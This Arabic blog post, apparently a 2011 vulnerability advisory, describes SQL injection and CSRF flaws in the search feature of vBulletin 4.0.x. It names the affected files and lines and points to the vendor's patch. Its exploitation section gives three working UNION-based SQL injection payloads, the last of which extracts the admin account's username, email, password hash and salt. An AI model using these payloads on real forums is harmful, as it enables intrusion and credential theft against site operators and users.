(اليوم صفر): ثغرة حقن , CSRF/XSRF في سكريبت المنتديات الشهير Vbulletin تعمل على الإصدار الرابع
الكاتب: صبري صالح | يوم: 27 مايو, 2011 | التعليقات: 0 | القراءات: - عدد المشاهدات 7٬179
مقدمة
تم اكتشاف ثغرة SQL injection و CSRF/XSRF في برنامج إدارة المحتوى الشهير Vbuuletin في محرك البحث الخاص به.
معلومات اختبار الاختراق
نظام التشغيل: جميع أنظمة التشغيل
المنصة: PHP , MySQL
معلومات الثغرة:
البرنامج: http://www.vbulletin.com
الإصدار المصاب: 4.0.x
تكمن التغرة في الملفات محرك البحث و هي
“/vb/search/searchtools.php” في السطر 751
“/packages/vbforum/search/type/socialgroup.php” في السطور 201 إلى 203
الاستغلال:
اذهب إلى محرك البحث , ثم إلى “Search Multiple Content Types“ ثم اختر المجموعات “groups“
وضع التالي في محرك البحث
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
لمزيد من التفاصيل
الحماية:
التحديث الأمني الرسمي من الشركة
vbulletin 4.X Security Batch
تحياتي و احترامي
المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.